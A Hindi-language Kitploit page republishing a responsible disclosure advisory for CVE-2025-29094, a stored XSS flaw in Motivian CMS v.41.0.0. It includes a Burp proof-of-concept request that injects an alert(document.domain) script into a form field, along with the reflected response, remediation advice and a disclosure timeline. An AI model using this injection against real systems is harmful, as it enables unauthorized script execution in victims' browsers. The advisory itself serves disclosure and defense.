Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-29094-Multiple-Stored-Cross-Site-Scripting-XSS — यह रिपॉजिटरी Motivian Content Management System v.41.0.0 में पाई गई एक सुरक्षा कमजोरी का खुलासा करती है। | Kitploit
उपकरण/GitHubGitHub/framarcuccio/cve-2025-29094-multiple-stored-cross-site-scripting-xss
भेद्यता विश्लेषणशोषणजानकारी एकत्र करनावेब सुरक्षापेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubframarcuccio/cve-2025-29094-multiple-stored-cross-site-scripting-xss

CVE-2025-29094-Multiple-Stored-Cross-Site-Scripting-XSS

यह रिपॉजिटरी Motivian Content Management System v.41.0.0 में पाई गई एक सुरक्षा कमजोरी का खुलासा करती है।

रिपॉजिटरी देखें
27 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-29094-एकाधिक-संग्रहीत-क्रॉस-साइट-स्क्रिप्टिंग-XSS

यह रिपॉजिटरी Motivian Content Management System v.41.0.0 में खोजी गई एक सुरक्षा कमजोरी को प्रकट करता है।

  • CVE-2025-29094: एकाधिक संग्रहीत क्रॉस-साइट स्क्रिप्टिंग (XSS)

यह कमजोरी जिम्मेदार प्रकटीकरण प्रथाओं के अनुसार विक्रेता को, और MITRE को सूचित की गई, जिसने एक अस्थायी CVE ID निर्दिष्ट की। विवरण 45-दिवसीय प्रकटीकरण अवधि समाप्त होने के बाद सार्वजनिक किए जा रहे हैं।

सामान्य जानकारी

  • शीर्षक: Motivian Stored Cross Site Scripting (XSS)
  • कमजोरी का प्रकार: Stored XSS
  • उत्पाद का विक्रेता: Motivian
  • उत्पाद: Motivian Content Management System
  • प्रभावित संस्करण: Motivian CMS v.41.0.0
  • प्रभावित घटक: Marketing/Forms, Marketing/Offers, Content/Pages
  • हमला वेक्टर: Remote
  • प्रभाव: पीड़ित के ब्राउज़र में मनमाना JavaScript निष्पादन
  • गंभीरता: उच्च
  • CVSSv3 स्कोर: 7.6
  • CVSSv3 वेक्टर: CVSS:3.1:AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N
  • CISA-ADP द्वारा गंभीरता: मध्यम
  • CISA-ADP द्वारा CVSSv3 स्कोर: 6.1
  • CISA-ADP द्वारा CVSSv3 वेक्टर: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
  • पाया गया: 2025-01-29
  • द्वारा: Francesco Marcuccio
  • स्थिति: 7 अप्रैल 2025 को विक्रेता को सूचित किया गया - 22 मई 2025 तक कोई प्रतिक्रिया/सुधार प्राप्त नहीं हुआ
  • विवरण

    Motivian Content Mangment System v.41.0.0 में क्रॉस-साइट स्क्रिप्टिंग कमजोरी एक दूरस्थ हमलावर को Marketing/Forms, Marketing/Offers और Content/Pages घटकों के माध्यम से मनमाना कोड निष्पादित करने की अनुमति देती है। इस कमजोरी का शोषण विभिन्न फ़ील्ड्स में दुर्भावनापूर्ण JavaScript कोड इंजेक्ट करके किया गया, जिसमें Marketing/Form और Marketing/Offers में शीर्षक, और Content/Pages में header script फ़ील्ड शामिल हैं।

    प्रमाण की अवधारणा

    इस कमजोरी का शोषण विभिन्न घटकों में विभिन्न फ़ील्ड्स के माध्यम से किया जा सकता है। प्रदर्शन उद्देश्यों के लिए, निम्नलिखित प्रूफ-ऑफ-कॉन्सेप्ट एक विशिष्ट परिदृश्य पर केंद्रित है:

    1. Marketing/Forms अनुभाग पर जाएं और एक नया फॉर्म तत्व बनाएं।
    2. Name फ़ील्ड में एक दुर्भावनापूर्ण स्क्रिप्ट डालें और फॉर्म को सहेजें।

    समस्या को प्रदर्शित करने के लिए उपयोग किए गए HTTP अनुरोधों और प्रतिक्रियाओं का पूर्ण प्रतिलेख नीचे दिया गया है:

    Burp Request

    root@kitploit:~
    POST /portal/admin/formbuilder/editCmsFormProps!saveForm.action HTTP/1.1
    Host: [REDACTED]
    Content-Length: 1362
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Cookie: [REDACTED]
    Connection: close
    
    targetFieldId=&targetFormId=&targetFieldIndex=&openedTabProps=tab1&langSelected=it&form.id=1162&search_form_id=&search_form_status_id=&search_form_name=&search_form_description=&date_from=&date_to=&currentPage=&struts.token.name=EditCmsFormProps&EditCmsFormProps=DBFW4RH1O9SVF1J3J9TA0WSD5VHPJCKY&date_notification=&form.seoName_en=&form.seoName_el=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&[...]
    

    Burp Response

    root@kitploit:~
    HTTP/1.1 200 OK
    Connection: close
    Date: Wed, 05 Feb 2025 12:00:09 GMT
    Content-Type: text/html;charset=ISO-8859-1
    Content-Language: it-IT
    Content-Length: 94593
    
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <title>MOTIVIAN | Content Management</title> <link rel="shortcut icon" type="image/x-icon" href="/portal/favicon.ico"/> <link rel="icon" type="image/x-icon" href="/portal/favicon.ico"/> <script> <a href="javascript:void(0)" class="sortingRow" onclick="javascript:simplePagesFormDoSort('status','asc')" >Status</a></td> <td class="TableHeader" colspan="9" style="width:188px">Management</td> <td class="TableHeader w10">&nbsp;</td> </tr> </table> </td> </tr> <tr> <td class="w10 row_odd">&nbsp;</td> <td class="w70 row_odd"> <div class="check-box w70" style="float:left"> <input type="checkbox" id="subpages_formIds_id_1162" name="formIds" value="1162"> <label for="subpages_formIds_id_1162">1162 </label> </div> </td> <td class="w40 row_odd"><img src="https://raw.githubusercontent.com/framarcuccio/cve-2025-29094-multiple-stored-cross-site-scripting-xss/main/portal/assets/images/red_form.png"/></td> <td class="NameCol row_odd"> <div class="wrap_words_within_rows w155"><script>alert(document.domain)</script> [...]
    

    उपचार

    सभी उपयोगकर्ता इनपुट को स्वच्छ करें और रेंडर करने से पहले आउटपुट को एस्केप करें। XSS जोखिमों को कम करने के लिए CSP (Content Security Policy) हेडर लागू करें।

    प्रकटीकरण समयरेखा

    DateAction
    2025-02-06CVE ID अनुरोध (CNA: MITRE)
    2025-04-02CVE ID असाइनमेंट
    2025-04-07विक्रेता को कमजोरियों की सूचना
    2025-05-3145-दिवसीय प्रकटीकरण अवधि समाप्त होने के बाद सार्वजनिक प्रकटीकरण (कुल 54 दिन)
    2025-06-04MITRE डेटाबेस और NIST/NVD पोर्टल में आधिकारिक पंजीकरण और प्रविष्टि

    क्रेडिट

    • द्वारा खोजा गया और जिम्मेदारी से प्रकट किया गया:
      Francesco Marcuccio
      साइबरसुरक्षा सलाहकार, पेनिट्रेशन टेस्टर

    • MITRE खोजकर्ता श्रेय इस प्रकार सूचीबद्ध:
      Francesco Marcuccio
      साइबरसुरक्षा सलाहकार, पेनिट्रेशन टेस्टर

    लिंक्स

    संदर्भ लिंक: MITRE NIST

    स्थिति

    यह CVE ID आधिकारिक तौर पर PUBLISHED स्थिति में है। विश्लेषण के बाद NIST द्वारा CVSS स्कोर के साथ अपडेट किया जाएगा।

    टूल डाउनलोड करें